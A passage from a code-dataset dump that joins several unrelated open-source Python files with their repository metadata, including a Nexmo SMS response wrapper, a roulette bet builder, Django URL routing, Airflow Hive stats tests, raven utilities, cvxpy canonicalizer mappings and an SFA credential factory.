if node.right_child:
self.traverse_in_order(node.right_child);
if __name__ == "__main__":
bst = BinarySearchTree();
bst.insert(10);
bst.insert(13);
bst.insert(5);
bst.insert(14);
bst.remove(13);
bst.traverse();
|
prk327/CoAca
|
Algo - DataStru/bst.py
|
Python
|
gpl-3.0
| 4,916 | 0.058381 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from decimal import Decimal as D
class NexmoResponse(object):
"""A convenient wrapper to manipulate the Nexmo json response.
The class makes it easy to retrieve information about sent messages, total
price, etc.
Example::
>>> response = nexmo.send_sms(frm, to, txt)
>>> print response.total_price
0.15
>>> print response.remaining_balance
1.00
>>> print response.message_count:
3
>>> for message in response.messages:
... print message.message_id, message.message_price
00000124 0.05
00000125 0.05
00000126 0.05
The class only handles successfull responses, since errors raise
exceptions in the :class:`~Nexmo` class.
"""
def __init__(self, json_data):
self.messages = [NexmoMessage(data) for data in json_data['messages']]
self.message_count = len(self.messages)
self.total_price = sum(msg.message_price for msg in self.messages)
self.remaining_balance = min(msg.remaining_balance for msg in self.messages)
class NexmoMessage(object):
"""A wrapper to manipulate a single `message` entry in a Nexmo response.
When a text messages is sent in several parts, Nexmo will return a status
for each and everyone of them.
The class does nothing more than simply wrapping the json data for easy
access.
"""
def __init__(self, json_data):
data = {
'to': json_data['to'],
'message_id': json_data['message-id'],
'status': int(json_data['status']),
'remaining_balance': D(json_data['remaining-balance']),
'message_price': D(json_data['message-price']),
'network': json_data['network']
}
self.__dict__.update(data)
|
thibault/libnexmo
|
libnexmo/response.py
|
Python
|
mit
| 1,868 | 0.000535 |
#PROJECT
from outcome import Outcome
from odds import Odds
class Bin:
def __init__(
self,
*outcomes
):
self.outcomes = set([outcome for outcome in outcomes])
def add_outcome(
self,
outcome
):
self.outcomes.add(outcome)
def __str__(self):
return ', '.join([str(outcome) for outcome in self.outcomes])
class BinBuilder:
def __init__(
self,
wheel
):
self.wheel = wheel
def build_bins(self):
self.straight_bets()
self.split_bets()
self.street_bets()
self.corner_bets()
self.five_bet()
self.line_bets()
self.dozen_bets()
self.column_bets()
self.even_money_bets()
def straight_bets(self):
outcomes = [
Outcome(str(i), Odds.STRAIGHT_BET)
for i in range(37)
] + [Outcome('00', Odds.STRAIGHT_BET)]
for i, outcome in enumerate(outcomes):
self.wheel.add_outcome(i, outcome)
def split_bets(self):
for row in range(12):
for direction in [1, 2]:
n = 3 * row + direction
bins = [n, n + 1]
outcome = Outcome(
'split {}'.format('-'.join([str(i) for i in bins])),
Odds.SPLIT_BET
)
for bin in bins:
self.wheel.add_outcome(bin, outcome)
for n in range(1, 34):
bins = [n, n + 3]
outcome = Outcome(
'split {}'.format('-'.join([str(i) for i in bins])),
Odds.SPLIT_BET
)
for bin in bins:
self.wheel.add_outcome(bin, outcome)
def street_bets(self):
for row in range(12):
n = 3 * row + 1
bins = [n, n + 1, n + 2]
outcome = Outcome(
'street {}-{}'.format(bins[0], bins[-1]),
Odds.STREET_BET
)
for bin in bins:
self.wheel.add_outcome(bin, outcome)
def corner_bets(self):
for col in [1, 2]:
for row in range(11):
n = 3 * row + col
bins = [n + i for i in [0, 1, 3, 4]]
outcome = Outcome(
'corner {}'.format('-'.join([str(i) for i in bins])),
Odds.CORNER_BET
)
for bin in bins:
self.wheel.add_outcome(bin, outcome)
def five_bet(self):
outcome = Outcome(
'five bet 00-0-1-2-3',
Odds.FIVE_BET
)
for bin in [0, 1, 2, 3, 37]:
self.wheel.add_outcome(bin, outcome)
def line_bets(self):
for row in range(11):
n = 3 * row + 1
bins = [n + i for i in range(6)]
outcome = Outcome(
'line {}-{}'.format(bins[0], bins[-1]),
Odds.LINE_BET
)
for bin in bins:
self.wheel.add_outcome(bin, outcome)
def dozen_bets(self):
#https://pypi.python.org/pypi/inflect/0.2.4
dozen_map = {
1: '1st',
2: '2nd',
3: '3rd'
}
for d in range(3):
outcome = Outcome(
'{} 12'.format(dozen_map[d + 1]),
Odds.DOZEN_BET
)
for m in range(12):
self.wheel.add_outcome(12 * d + m + 1, outcome)
def column_bets(self):
for c in range(3):
outcome = Outcome(
'column {}'.format(c + 1),
Odds.COLUMN_BET
)
for r in range(12):
self.wheel.add_outcome(3 * r + c + 1, outcome)
def even_money_bets(self):
for bin in range(1, 37):
if 1 <= bin < 19:
name = '1 to 18' #low
else:
name = '19 to 36' #high
self.wheel.add_outcome(
bin,
Outcome(name, Odds.EVEN_MONEY_BET)
)
if bin % 2:
name = 'odd'
else:
name = 'even'
self.wheel.add_outcome(
bin,
Outcome(name, Odds.EVEN_MONEY_BET)
)
if bin in (
[1, 3, 5, 7, 9] +
[12, 14, 16, 18] +
[19, 21, 23, 25, 27] +
[30, 32, 34, 36]
):
name = 'red'
else:
name = 'black'
self.wheel.add_outcome(
bin,
Outcome(name, Odds.EVEN_MONEY_BET)
)
|
ddenhartog/itmaybeahack-roulette
|
bin.py
|
Python
|
mit
| 4,662 | 0.000858 |
from django.conf.urls import include, url
from django.conf import settings
from django.contrib import admin
from djgeojson.views import GeoJSONLayerView
from wagtail.contrib.wagtailsitemaps.views import sitemap
from wagtail.wagtailadmin import urls as wagtailadmin_urls
from wagtail.wagtaildocs import urls as wagtaildocs_urls
from wagtail.wagtailcore import urls as wagtail_urls
from waespk.core import urls as ossuo_urls
urlpatterns = [
url(r'^django-admin/', include(admin.site.urls)),
url(r'^admin/', include(wagtailadmin_urls)),
url(r'^documents/', include(wagtaildocs_urls)),
url(r'^sitemap\.xml$', sitemap),
]
if settings.DEBUG:
from django.conf.urls.static import static
from django.contrib.staticfiles.urls import staticfiles_urlpatterns
from django.views.generic import TemplateView, RedirectView
# Serve static and media files from development server
urlpatterns += staticfiles_urlpatterns()
urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
# Add views for testing 404 and 500 templates
urlpatterns += [
url(r'^test404/$', TemplateView.as_view(template_name='404.html')),
url(r'^test500/$', TemplateView.as_view(template_name='500.html')),
]
# Favicon
urlpatterns += [
url(r'^favicon\.ico$', RedirectView.as_view(url=settings.STATIC_URL + 'ossuo.com/images/favicon.ico')),
]
urlpatterns += [
url(r'', include(ossuo_urls)),
url(r'', include(wagtail_urls)),
]
handler404 = 'waespk.core.views.error404'
|
spketoundi/CamODI
|
waespk/urls.py
|
Python
|
mit
| 1,548 | 0.001292 |
#!/usr/bin/python
# -*- coding: iso-8859-15 -*-
#
# module_dumper.py - WIDS/WIPS framework file dumper module
# Copyright (C) 2009 Peter Krebs, Herbert Haas
#
# This program is free software; you can redistribute it and/or modify it under
# the terms of the GNU General Public License version 2 as published by the
# Free Software Foundation.
#
# This program is distributed in the hope that it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# You should have received a copy of the GNU General Public License along with
# this program; if not, see http://www.gnu.org/licenses/gpl-2.0.html
"""Dumper module
Test module which outputs any input values in a file.
"""
# Imports
#
# Custom modules
import fw_modules.module_template
from fw_modules.module_exceptions import *
# Standard modules
import time
# Third-party modules
class DumperClass(fw_modules.module_template.ModuleClass):
"""DumperClass
Receives messages and dumps them into file.
"""
def __init__(self, controller_reference, parameter_dictionary, module_logger):
"""Constructor
"""
fw_modules.module_template.ModuleClass.__init__(self, controller=controller_reference, param_dict=parameter_dictionary, logger=module_logger)
# Default values.
try:
self.dumpfile_path = self.param_dict['dumpfile']
except KeyError:
raise FwModuleSetupError, self.module_identifier + ": ERROR: No dumpfile specified"
self.module_logger.error("No dumpfile specified")
return None
# Helper values.
self.DUMPFILE = None
def after_run(self):
"""after_run()
Closes dumpfile.
"""
try:
self.DUMPFILE.close()
except IOError:
self.module_logger.warning("Couldn't close dumpfile properly")
def before_run(self):
"""before_run()
Opens dumpfile.
"""
try:
self.DUMPFILE = open(self.dumpfile_path, "w")
except IOError:
self.module_logger.error("Couldn't open file " + str(self.dumpfile_path))
return False
else:
return True
def dump_to_file(self, data):
"""dump_to_file()
Dumps input to file.
"""
self.module_logger.debug("Dumped data: " + str(data))
try:
self.DUMPFILE.write(data + "\n")
self.DUMPFILE.flush()
except IOError as err:
self.module_logger.warning("Couldn't dump to file; details: " + err.__str__())
def process(self, input):
"""process()
Main action.
"""
self.module_logger.debug("Raw input: " + str(input))
self.dump_to_file(input)
def main(controller_reference, parameter_dictionary, module_logger):
dumper_class = DumperClass(controller_reference, parameter_dictionary, module_logger)
return dumper_class
if __name__ == "__main__":
print "Warning: This module is not intended to be executed directly. Only do this for test purposes."
|
pkrebs/WIDPS
|
fw_modules/module_dumper.py
|
Python
|
gpl-2.0
| 3,313 | 0.00815 |
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import os
import re
import unittest
from collections import OrderedDict
from unittest.mock import patch
import pytest
from airflow.exceptions import AirflowException
from airflow.providers.apache.hive.operators.hive_stats import HiveStatsCollectionOperator
from tests.providers.apache.hive import DEFAULT_DATE, DEFAULT_DATE_DS, TestHiveEnvironment
from tests.test_utils.mock_hooks import MockHiveMetastoreHook, MockMySqlHook, MockPrestoHook
class _FakeCol:
def __init__(self, col_name, col_type):
self.name = col_name
self.type = col_type
fake_col = _FakeCol('col', 'string')
class TestHiveStatsCollectionOperator(TestHiveEnvironment):
def setUp(self):
self.kwargs = dict(
table='table',
partition=dict(col='col', value='value'),
metastore_conn_id='metastore_conn_id',
presto_conn_id='presto_conn_id',
mysql_conn_id='mysql_conn_id',
task_id='test_hive_stats_collection_operator',
)
super().setUp()
def test_get_default_exprs(self):
col = 'col'
default_exprs = HiveStatsCollectionOperator(**self.kwargs).get_default_exprs(col, None)
assert default_exprs == {(col, 'non_null'): f'COUNT({col})'}
def test_get_default_exprs_excluded_cols(self):
col = 'excluded_col'
self.kwargs.update(dict(excluded_columns=[col]))
default_exprs = HiveStatsCollectionOperator(**self.kwargs).get_default_exprs(col, None)
assert default_exprs == {}
def test_get_default_exprs_number(self):
col = 'col'
for col_type in ['double', 'int', 'bigint', 'float']:
default_exprs = HiveStatsCollectionOperator(**self.kwargs).get_default_exprs(col, col_type)
assert default_exprs == {
(col, 'avg'): f'AVG({col})',
(col, 'max'): f'MAX({col})',
(col, 'min'): f'MIN({col})',
(col, 'non_null'): f'COUNT({col})',
(col, 'sum'): f'SUM({col})',
}
def test_get_default_exprs_boolean(self):
col = 'col'
col_type = 'boolean'
default_exprs = HiveStatsCollectionOperator(**self.kwargs).get_default_exprs(col, col_type)
assert default_exprs == {
(col, 'false'): f'SUM(CASE WHEN NOT {col} THEN 1 ELSE 0 END)',
(col, 'non_null'): f'COUNT({col})',
(col, 'true'): f'SUM(CASE WHEN {col} THEN 1 ELSE 0 END)',
}
def test_get_default_exprs_string(self):
col = 'col'
col_type = 'string'
default_exprs = HiveStatsCollectionOperator(**self.kwargs).get_default_exprs(col, col_type)
assert default_exprs == {
(col, 'approx_distinct'): f'APPROX_DISTINCT({col})',
(col, 'len'): f'SUM(CAST(LENGTH({col}) AS BIGINT))',
(col, 'non_null'): f'COUNT({col})',
}
@patch('airflow.providers.apache.hive.operators.hive_stats.json.dumps')
@patch('airflow.providers.apache.hive.operators.hive_stats.MySqlHook')
@patch('airflow.providers.apache.hive.operators.hive_stats.PrestoHook')
@patch('airflow.providers.apache.hive.operators.hive_stats.HiveMetastoreHook')
def test_execute(self, mock_hive_metastore_hook, mock_presto_hook, mock_mysql_hook, mock_json_dumps):
mock_hive_metastore_hook.return_value.get_table.return_value.sd.cols = [fake_col]
mock_mysql_hook.return_value.get_records.return_value = False
hive_stats_collection_operator = HiveStatsCollectionOperator(**self.kwargs)
hive_stats_collection_operator.execute(context={})
mock_hive_metastore_hook.assert_called_once_with(
metastore_conn_id=hive_stats_collection_operator.metastore_conn_id
)
mock_hive_metastore_hook.return_value.get_table.assert_called_once_with(
table_name=hive_stats_collection_operator.table
)
mock_presto_hook.assert_called_once_with(presto_conn_id=hive_stats_collection_operator.presto_conn_id)
mock_mysql_hook.assert_called_once_with(hive_stats_collection_operator.mysql_conn_id)
mock_json_dumps.assert_called_once_with(hive_stats_collection_operator.partition, sort_keys=True)
field_types = {
col.name: col.type for col in mock_hive_metastore_hook.return_value.get_table.return_value.sd.cols
}
exprs = {('', 'count'): 'COUNT(*)'}
for col, col_type in list(field_types.items()):
exprs.update(hive_stats_collection_operator.get_default_exprs(col, col_type))
exprs = OrderedDict(exprs)
rows = [
(
hive_stats_collection_operator.ds,
hive_stats_collection_operator.dttm,
hive_stats_collection_operator.table,
mock_json_dumps.return_value,
)
+ (r[0][0], r[0][1], r[1])
for r in zip(exprs, mock_presto_hook.return_value.get_first.return_value)
]
mock_mysql_hook.return_value.insert_rows.assert_called_once_with(
table='hive_stats',
rows=rows,
target_fields=[
'ds',
'dttm',
'table_name',
'partition_repr',
'col',
'metric',
'value',
],
)
@patch('airflow.providers.apache.hive.operators.hive_stats.json.dumps')
@patch('airflow.providers.apache.hive.operators.hive_stats.MySqlHook')
@patch('airflow.providers.apache.hive.operators.hive_stats.PrestoHook')
@patch('airflow.providers.apache.hive.operators.hive_stats.HiveMetastoreHook')
def test_execute_with_assignment_func(
self, mock_hive_metastore_hook, mock_presto_hook, mock_mysql_hook, mock_json_dumps
):
def assignment_func(col, _):
return {(col, 'test'): f'TEST({col})'}
self.kwargs.update(dict(assignment_func=assignment_func))
mock_hive_metastore_hook.return_value.get_table.return_value.sd.cols = [fake_col]
mock_mysql_hook.return_value.get_records.return_value = False
hive_stats_collection_operator = HiveStatsCollectionOperator(**self.kwargs)
hive_stats_collection_operator.execute(context={})
field_types = {
col.name: col.type for col in mock_hive_metastore_hook.return_value.get_table.return_value.sd.cols
}
exprs = {('', 'count'): 'COUNT(*)'}
for col, col_type in list(field_types.items()):
exprs.update(hive_stats_collection_operator.assignment_func(col, col_type))
exprs = OrderedDict(exprs)
rows = [
(
hive_stats_collection_operator.ds,
hive_stats_collection_operator.dttm,
hive_stats_collection_operator.table,
mock_json_dumps.return_value,
)
+ (r[0][0], r[0][1], r[1])
for r in zip(exprs, mock_presto_hook.return_value.get_first.return_value)
]
mock_mysql_hook.return_value.insert_rows.assert_called_once_with(
table='hive_stats',
rows=rows,
target_fields=[
'ds',
'dttm',
'table_name',
'partition_repr',
'col',
'metric',
'value',
],
)
@patch('airflow.providers.apache.hive.operators.hive_stats.json.dumps')
@patch('airflow.providers.apache.hive.operators.hive_stats.MySqlHook')
@patch('airflow.providers.apache.hive.operators.hive_stats.PrestoHook')
@patch('airflow.providers.apache.hive.operators.hive_stats.HiveMetastoreHook')
def test_execute_with_assignment_func_no_return_value(
self, mock_hive_metastore_hook, mock_presto_hook, mock_mysql_hook, mock_json_dumps
):
def assignment_func(_, __):
pass
self.kwargs.update(dict(assignment_func=assignment_func))
mock_hive_metastore_hook.return_value.get_table.return_value.sd.cols = [fake_col]
mock_mysql_hook.return_value.get_records.return_value = False
hive_stats_collection_operator = HiveStatsCollectionOperator(**self.kwargs)
hive_stats_collection_operator.execute(context={})
field_types = {
col.name: col.type for col in mock_hive_metastore_hook.return_value.get_table.return_value.sd.cols
}
exprs = {('', 'count'): 'COUNT(*)'}
for col, col_type in list(field_types.items()):
exprs.update(hive_stats_collection_operator.get_default_exprs(col, col_type))
exprs = OrderedDict(exprs)
rows = [
(
hive_stats_collection_operator.ds,
hive_stats_collection_operator.dttm,
hive_stats_collection_operator.table,
mock_json_dumps.return_value,
)
+ (r[0][0], r[0][1], r[1])
for r in zip(exprs, mock_presto_hook.return_value.get_first.return_value)
]
mock_mysql_hook.return_value.insert_rows.assert_called_once_with(
table='hive_stats',
rows=rows,
target_fields=[
'ds',
'dttm',
'table_name',
'partition_repr',
'col',
'metric',
'value',
],
)
@patch('airflow.providers.apache.hive.operators.hive_stats.MySqlHook')
@patch('airflow.providers.apache.hive.operators.hive_stats.PrestoHook')
@patch('airflow.providers.apache.hive.operators.hive_stats.HiveMetastoreHook')
def test_execute_no_query_results(self, mock_hive_metastore_hook, mock_presto_hook, mock_mysql_hook):
mock_hive_metastore_hook.return_value.get_table.return_value.sd.cols = [fake_col]
mock_mysql_hook.return_value.get_records.return_value = False
mock_presto_hook.return_value.get_first.return_value = None
with pytest.raises(AirflowException):
HiveStatsCollectionOperator(**self.kwargs).execute(context={})
@patch('airflow.providers.apache.hive.operators.hive_stats.json.dumps')
@patch('airflow.providers.apache.hive.operators.hive_stats.MySqlHook')
@patch('airflow.providers.apache.hive.operators.hive_stats.PrestoHook')
@patch('airflow.providers.apache.hive.operators.hive_stats.HiveMetastoreHook')
def test_execute_delete_previous_runs_rows(
self, mock_hive_metastore_hook, mock_presto_hook, mock_mysql_hook, mock_json_dumps
):
mock_hive_metastore_hook.return_value.get_table.return_value.sd.cols = [fake_col]
mock_mysql_hook.return_value.get_records.return_value = True
hive_stats_collection_operator = HiveStatsCollectionOperator(**self.kwargs)
hive_stats_collection_operator.execute(context={})
sql = f"""
DELETE FROM hive_stats
WHERE
table_name='{hive_stats_collection_operator.table}' AND
partition_repr='{mock_json_dumps.return_value}' AND
dttm='{hive_stats_collection_operator.dttm}';
"""
mock_mysql_hook.return_value.run.assert_called_once_with(sql)
@unittest.skipIf(
'AIRFLOW_RUNALL_TESTS' not in os.environ, "Skipped because AIRFLOW_RUNALL_TESTS is not set"
)
@patch(
'airflow.providers.apache.hive.operators.hive_stats.HiveMetastoreHook',
side_effect=MockHiveMetastoreHook,
)
def test_runs_for_hive_stats(self, mock_hive_metastore_hook):
mock_mysql_hook = MockMySqlHook()
mock_presto_hook = MockPrestoHook()
with patch(
'airflow.providers.apache.hive.operators.hive_stats.PrestoHook', return_value=mock_presto_hook
):
with patch(
'airflow.providers.apache.hive.operators.hive_stats.MySqlHook', return_value=mock_mysql_hook
):
op = HiveStatsCollectionOperator(
task_id='hive_stats_check',
table="airflow.static_babynames_partitioned",
partition={'ds': DEFAULT_DATE_DS},
dag=self.dag,
)
op.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
select_count_query = (
"SELECT COUNT(*) AS __count "
"FROM airflow.static_babynames_partitioned "
"WHERE ds = '2015-01-01';"
)
mock_presto_hook.get_first.assert_called_with(hql=select_count_query)
expected_stats_select_query = (
"SELECT 1 "
"FROM hive_stats "
"WHERE table_name='airflow.static_babynames_partitioned' "
" AND partition_repr='{\"ds\": \"2015-01-01\"}' "
" AND dttm='2015-01-01T00:00:00+00:00' "
"LIMIT 1;"
)
raw_stats_select_query = mock_mysql_hook.get_records.call_args_list[0][0][0]
actual_stats_select_query = re.sub(r'\s{2,}', ' ', raw_stats_select_query).strip()
assert expected_stats_select_query == actual_stats_select_query
insert_rows_val = [
(
'2015-01-01',
'2015-01-01T00:00:00+00:00',
'airflow.static_babynames_partitioned',
'{"ds": "2015-01-01"}',
'',
'count',
['val_0', 'val_1'],
)
]
mock_mysql_hook.insert_rows.assert_called_with(
table='hive_stats',
rows=insert_rows_val,
target_fields=[
'ds',
'dttm',
'table_name',
'partition_repr',
'col',
'metric',
'value',
],
)
|
apache/incubator-airflow
|
tests/providers/apache/hive/operators/test_hive_stats.py
|
Python
|
apache-2.0
| 14,564 | 0.003158 |
"""
raven.utils
~~~~~~~~~~~~~~~~~~~
:copyright: (c) 2010 by the Sentry Team, see AUTHORS for more details.
:license: BSD, see LICENSE for more details.
"""
import hashlib
import hmac
import logging
try:
import pkg_resources
except ImportError:
pkg_resources = None
import sys
import raven
def construct_checksum(level=logging.ERROR, class_name='', traceback='', message='', **kwargs):
checksum = hashlib.md5(str(level))
checksum.update(class_name or '')
if 'data' in kwargs and kwargs['data'] and '__sentry__' in kwargs['data'] and 'frames' in kwargs['data']['__sentry__']:
frames = kwargs['data']['__sentry__']['frames']
for frame in frames:
checksum.update(frame['module'])
checksum.update(frame['function'])
elif traceback:
traceback = '\n'.join(traceback.split('\n')[:-3])
elif message:
if isinstance(message, unicode):
message = message.encode('utf-8', 'replace')
checksum.update(message)
return checksum.hexdigest()
def varmap(func, var, context=None):
if context is None:
context = {}
objid = id(var)
if objid in context:
return func('<...>')
context[objid] = 1
if isinstance(var, dict):
ret = dict((k, varmap(func, v, context)) for k, v in var.iteritems())
elif isinstance(var, (list, tuple)):
ret = [varmap(func, f, context) for f in var]
else:
ret = func(var)
del context[objid]
return ret
# We store a cache of module_name->version string to avoid
# continuous imports and lookups of modules
_VERSION_CACHE = {}
def get_versions(module_list=None):
if not module_list:
return {}
ext_module_list = set()
for m in module_list:
parts = m.split('.')
ext_module_list.update('.'.join(parts[:idx]) for idx in xrange(1, len(parts)+1))
versions = {}
for module_name in ext_module_list:
if module_name not in _VERSION_CACHE:
try:
__import__(module_name)
except ImportError:
continue
app = sys.modules[module_name]
if hasattr(app, 'get_version'):
get_version = app.get_version
if callable(get_version):
version = get_version()
else:
version = get_version
elif hasattr(app, 'VERSION'):
version = app.VERSION
elif hasattr(app, '__version__'):
version = app.__version__
elif pkg_resources:
# pull version from pkg_resources if distro exists
try:
version = pkg_resources.get_distribution(module_name).version
except pkg_resources.DistributionNotFound:
version = None
else:
version = None
if isinstance(version, (list, tuple)):
version = '.'.join(str(o) for o in version)
_VERSION_CACHE[module_name] = version
else:
version = _VERSION_CACHE[module_name]
if version is None:
continue
versions[module_name] = version
return versions
def get_signature(key, message, timestamp):
return hmac.new(key, '%s %s' % (timestamp, message), hashlib.sha1).hexdigest()
def get_auth_header(signature, timestamp, client):
return 'Sentry sentry_signature=%s, sentry_timestamp=%s, raven=%s' % (
signature,
timestamp,
raven.VERSION,
)
|
mitsuhiko/raven
|
raven/utils/__init__.py
|
Python
|
bsd-3-clause
| 3,540 | 0.003107 |
"""
Copyright 2017 Robin Verschueren
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from cvxpy.atoms import (bmat, cumsum, diag, kron, conv,
abs, reshape, trace,
upper_tri, conj, imag, real,
norm1, norm_inf, Pnorm,
sigma_max, lambda_max, lambda_sum_largest,
log_det, QuadForm, MatrixFrac, quad_over_lin)
from cvxpy.atoms.affine.promote import Promote
from cvxpy.atoms.affine.sum import Sum
from cvxpy.atoms.affine.add_expr import AddExpression
from cvxpy.atoms.affine.index import index, special_index
from cvxpy.atoms.affine.unary_operators import NegExpression
from cvxpy.atoms.affine.transpose import transpose
from cvxpy.atoms.affine.hstack import Hstack
from cvxpy.atoms.affine.vstack import Vstack
from cvxpy.atoms.norm_nuc import normNuc
from cvxpy.atoms.affine.binary_operators import (MulExpression,
multiply,
DivExpression)
from cvxpy.expressions.constants import Constant, Parameter
from cvxpy.expressions.variable import Variable
from cvxpy.constraints import NonPos, SOC, PSD, Zero
from cvxpy.reductions.complex2real.atom_canonicalizers.abs_canon import abs_canon
from cvxpy.reductions.complex2real.atom_canonicalizers.aff_canon import (separable_canon,
real_canon,
imag_canon,
conj_canon,
binary_canon)
from cvxpy.reductions.complex2real.atom_canonicalizers.pnorm_canon import pnorm_canon
from cvxpy.reductions.complex2real.atom_canonicalizers.matrix_canon import (
hermitian_canon, quad_canon, lambda_sum_largest_canon, norm_nuc_canon, matrix_frac_canon,
quad_over_lin_canon)
from cvxpy.reductions.complex2real.atom_canonicalizers.nonpos_canon import nonpos_canon
from cvxpy.reductions.complex2real.atom_canonicalizers.psd_canon import psd_canon
from cvxpy.reductions.complex2real.atom_canonicalizers.soc_canon import soc_canon
from cvxpy.reductions.complex2real.atom_canonicalizers.variable_canon import variable_canon
from cvxpy.reductions.complex2real.atom_canonicalizers.constant_canon import constant_canon
from cvxpy.reductions.complex2real.atom_canonicalizers.param_canon import param_canon
from cvxpy.reductions.complex2real.atom_canonicalizers.zero_canon import zero_canon
CANON_METHODS = {
AddExpression: separable_canon,
bmat: separable_canon,
cumsum: separable_canon,
diag: separable_canon,
Hstack: separable_canon,
index: separable_canon,
special_index: separable_canon,
Promote: separable_canon,
reshape: separable_canon,
Sum: separable_canon,
trace: separable_canon,
transpose: separable_canon,
NegExpression: separable_canon,
upper_tri: separable_canon,
Vstack: separable_canon,
conv: binary_canon,
DivExpression: binary_canon,
kron: binary_canon,
MulExpression: binary_canon,
multiply: binary_canon,
conj: conj_canon,
imag: imag_canon,
real: real_canon,
Variable: variable_canon,
Constant: constant_canon,
Parameter: param_canon,
NonPos: nonpos_canon,
PSD: psd_canon,
SOC: soc_canon,
Zero: zero_canon,
abs: abs_canon,
norm1: pnorm_canon,
norm_inf: pnorm_canon,
Pnorm: pnorm_canon,
lambda_max: hermitian_canon,
log_det: norm_nuc_canon,
normNuc: norm_nuc_canon,
sigma_max: hermitian_canon,
QuadForm: quad_canon,
quad_over_lin: quad_over_lin_canon,
MatrixFrac: matrix_frac_canon,
lambda_sum_largest: lambda_sum_largest_canon,
}
|
SteveDiamond/cvxpy
|
cvxpy/reductions/complex2real/atom_canonicalizers/__init__.py
|
Python
|
gpl-3.0
| 4,337 | 0.003459 |
#----------------------------------------------------------------------
# Copyright (c) 2014 Raytheon BBN Technologies
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and/or hardware specification (the "Work") to
# deal in the Work without restriction, including without limitation the
# rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Work, and to permit persons to whom the Work
# is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Work.
#
# THE WORK IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE WORK OR THE USE OR OTHER DEALINGS
# IN THE WORK.
#----------------------------------------------------------------------
from sfa.util.sfalogging import logger
from sfa.trust.credential import Credential
from sfa.trust.abac_credential import ABACCredential
import json
import re
# Factory for creating credentials of different sorts by type.
# Specifically, this factory can create standard SFA credentials
# and ABAC credentials from XML strings based on their identifying content
class CredentialFactory:
UNKNOWN_CREDENTIAL_TYPE = 'geni_unknown'
# Static Credential class method to determine the type of a credential
# string depending on its contents
@staticmethod
def getType(credString):
credString_nowhitespace = re.sub('\s', '', credString)
if credString_nowhitespace.find('<type>abac</type>') > -1:
return ABACCredential.ABAC_CREDENTIAL_TYPE
elif credString_nowhitespace.find('<type>privilege</type>') > -1:
return Credential.SFA_CREDENTIAL_TYPE
else:
st = credString_nowhitespace.find('<type>')
end = credString_nowhitespace.find('</type>', st)
return credString_nowhitespace[st + len('<type>'):end]
# return CredentialFactory.UNKNOWN_CREDENTIAL_TYPE
# Static Credential class method to create the appropriate credential
# (SFA or ABAC) depending on its type
@staticmethod
def createCred(credString=None, credFile=None):
if not credString and not credFile:
raise Exception("CredentialFactory.createCred called with no argument")
if credFile:
try:
credString = open(credFile).read()
except Exception, e:
logger.info("Error opening credential file %s: %s" % credFile, e)
return None
# Try to treat the file as JSON, getting the cred_type from the struct
try:
credO = json.loads(credString, encoding='ascii')
if credO.has_key('geni_value') and credO.has_key('geni_type'):
cred_type = credO['geni_type']
credString = credO['geni_value']
except Exception, e:
# It wasn't a struct. So the credString is XML. Pull the type directly from the string
logger.debug("Credential string not JSON: %s" % e)
cred_type = CredentialFactory.getType(credString)
if cred_type == Credential.SFA_CREDENTIAL_TYPE:
try:
cred = Credential(string=credString)
return cred
except Exception, e:
if credFile:
msg = "credString started: %s" % credString[:50]
raise Exception("%s not a parsable SFA credential: %s. " % (credFile, e) + msg)
else:
raise Exception("SFA Credential not parsable: %s. Cred start: %s..." % (e, credString[:50]))
elif cred_type == ABACCredential.ABAC_CREDENTIAL_TYPE:
try:
cred = ABACCredential(string=credString)
return cred
except Exception, e:
if credFile:
raise Exception("%s not a parsable ABAC credential: %s" % (credFile, e))
else:
raise Exception("ABAC Credential not parsable: %s. Cred start: %s..." % (e, credString[:50]))
else:
raise Exception("Unknown credential type '%s'" % cred_type)
if __name__ == "__main__":
c2 = open('/tmp/sfa.xml').read()
cred1 = CredentialFactory.createCred(credFile='/tmp/cred.xml')
cred2 = CredentialFactory.createCred(credString=c2)
print "C1 = %s" % cred1
print "C2 = %s" % cred2
c1s = cred1.dump_string()
print "C1 = %s" % c1s
# print "C2 = %s" % cred2.dump_string()
|
yippeecw/sfa
|
sfa/trust/credential_factory.py
|
Python
|
mit
| 5,023 | 0.002588 |
# -*- python -*-
# Copyright (C) 2009-2017 Free Software Foundation, Inc.
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
